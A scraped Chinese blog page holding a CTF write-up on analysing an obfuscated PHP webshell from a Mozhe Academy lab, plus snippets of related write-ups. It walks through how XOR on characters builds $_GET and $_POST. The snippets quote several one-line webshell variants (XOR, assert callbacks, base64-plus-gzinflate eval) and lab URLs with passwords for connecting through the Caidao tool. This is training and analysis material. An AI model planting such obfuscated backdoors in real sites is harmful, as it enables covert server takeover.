墨者学院 - PHP代码分析溯源(第1题)

最新推荐文章于 2022-12-11 09:53:14 发布
最新推荐文章于 2022-12-11 09:53:14 发布
阅读量870 收藏 3
点赞数
分类专栏: web webshell 文章标签: PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/81281299
版权
本文详细分析了PHP中的异或运算符用于字符串处理的案例,解释了未定义变量自增得到数字的过程,并展示了如何利用异或构造特殊变量名,最终形成$_GET和$_POST的访问。同时提到了一句话木马的构造和利用方法,以及通过菜刀工具进行连接的示例。
摘要由CSDN通过智能技术生成

1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。
2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。
3、$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
("`"^"?")       01100000^00111111=01011111 —>”_”
(":"^"}")        00111010^01111101=01000111—>”G”
("%"^"`")      00100101^01100000=01000101—>”E”
("{"^"/")        01111011^ 00101111=01010100—>”T”
得到$__=_GET
4、$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
("$"^"{")        00100100^01111011=01011111—>”_”
("~"^".")        01111110^001011

最低0.47元/天 解锁文章
多崎巡礼
关注
专栏目录
墨者学院 - PHP代码分析溯源(第2)
多崎巡礼的博客
07-30 1287
根据干看了好久的php隐式转换。。。 还是毫无头绪。。。 这样的逻辑几乎是无解的。。。 md5(QNKCDZO,32) = 0e830400451993494058024219903391   根据PHP Hash比较存在缺陷 http://www.freebuf.com/news/67007.html 。。。在这道中,最重要的一句话就是: 根据php的隐式转换可以知道 o...
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 841
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     <?php error_reporting(0); call...
PHP代码分析溯源(第1)
mozhe_的博客
05-25 1681
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码,经分析:1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中...
墨者 - PHP代码分析溯源(第1)
吃肉唐僧的博客
07-12 649
进入环境,发现是php源码 用在线php代码调试工具调试(要用echo输出,将${$__}[!$_](${$___}[$_]);删掉,否则报错) 结合输出,${$__}[!$_](${$___}[$_]); 的意思大概是 <?php $_GET[0]($_POST[1])?> 这是php一句话木马的变种 其他更多变种参考:https://blog.csdn.net/x...
墨者学院-PHP代码分析溯源(第1)
JimWu的博客
09-04 418
PHP代码分析溯源(第1) 难易程度:★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.访问网页,得到php代码 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[...
墨者学院-php代码分析溯源
臭nana的博客
12-14 388
打开发现代码是base64+压缩的编码 最简单的方式是将eval变成echo,其他方法 得到echo `$_REQUEST[a]`;; ?&gt; 构造payload:?a=ls,发现key文件   用了ls就明白这是肯定不是在windows系统,所以不能用file_get_contents 两种方法: 1.使用cat不能直接读取出来,但可以查看源代码,在前面加view-...
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 744
&lt;?php  if(!empty($_GET[1]) &amp;&amp; $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 719
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 817
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
墨者学院 - PHP代码分析溯源(第3)
多崎巡礼的博客
08-03 693
在for 循环中是判断输入的字符是否有存在在1和9之间的数字 如果不存在判断是否等于54975581388 等于则绕过 即 又不能等于数字1-9又要等于54975581388 但是这里在比较的时候就是用弱类型的,所以不要求完全一致。 php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc 键入 0xccccccccc 输入得到key...
墨者学院-php分析溯源
JimWu的博客
09-04 359
php分析溯源 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.打开靶场,下载源码。 2.打开文件夹,发现shell.php。 3.打开文件,发现一句话木马。 参数a的值给md5加密了,解密后为1Q2W3E。 3个=为全等,不仅比较值,而且还比较值的类型。 4.打开菜刀连接,构造url为 http://219.153.49.228:47779/shell.php?a...
墨者学院靶场之PHP代码分析溯源(第1)
weixin_30892037的博客
06-11 175
申请靶场环境后 点开目 一段奇怪的PHP代码 因为我自己电脑重装了win10系统,php+apache+mysql的环境本地主机觉得没必要弄了,于是我们用在线的PHP编码(百度一下到处都是) 复制进去以";"来排个格式 运行下,报错。 看看源码,"$_" "$__" "$___" 这三个是变量名,我们用echo输出下内容 连在一起了,但是可以确定 ...
墨者PHP代码分析溯源(第4)
zr1213159840的博客
01-16 656
首先打开页面,有个提示,而且还有段代码 仔细看下这段代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?> 能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev
墨者学院 PHP代码分析溯源(第4) 详解
永远是少年
12-11 795
今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4)。 一、目简介 二、破解源码 三、命令执行拿到key
[ 墨者学院 ] 代码审计 —— PHP代码分析溯源(第1
weixin_30908707的博客
06-20 288
0x01.目描述: 背景介绍 某日,在某公司做IT维护的朋友给安全工程师"墨者"发了一个PHP文件,说在其WEB服务器发现多了一个b.php文件,目前不确定这个文件是开发留下的正常文件还是攻击者上传的木马后门,希望"墨者"能够帮他分析一下。 实训...
墨者学院sql注入 x-f
最新发布
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值